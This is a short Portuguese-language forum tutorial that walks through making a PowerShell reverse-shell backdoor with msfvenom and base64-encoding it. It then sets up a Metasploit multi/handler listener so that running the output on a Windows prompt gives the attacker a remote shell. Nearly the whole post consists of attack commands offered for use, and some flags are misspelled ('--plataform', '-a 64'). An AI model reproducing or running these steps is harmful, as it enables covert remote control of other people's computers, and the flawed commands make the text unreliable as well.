Descrição
Primeiramente vamos criar o payload
Código: Selecionar todos
msfvenom -p windows/x64/powershell_reverse_tcp -a x64 --plataform windows -o backdoor.ps1 LHOST=seuhost LPORT=suaporta
Abra o arquivo backdoor.ps1 e apague todos os caracteres zoados
Depois execute o comando em outro terminal
Código: Selecionar todos
cat backdoor.ps1 | msfvenom -e powershell/base64 -a 64 --plataform windows
Vamos abrir o console agora
Código: Selecionar todos
msfconsole
Selecione o exploit
Código: Selecionar todos
use exploit/multi/handler
Sete o payload
Código: Selecionar todos
set PAYLOAD windows/x64/powershell_reverse_tcp
Sete o LHOST
Código: Selecionar todos
set LHOST seuhost
Sete o LPORT
Código: Selecionar todos
set LPORT suaporta
Depois execute
Código: Selecionar todos
exploit -j
Onde eu pedi para vocês darem o cat no arquivo, copiem o que está dentro do arquivo começando por “powershell.exe -exec” até o final do arquivo, basta rodar todo esse comando no prompt de comando do windows que você ganhará a shell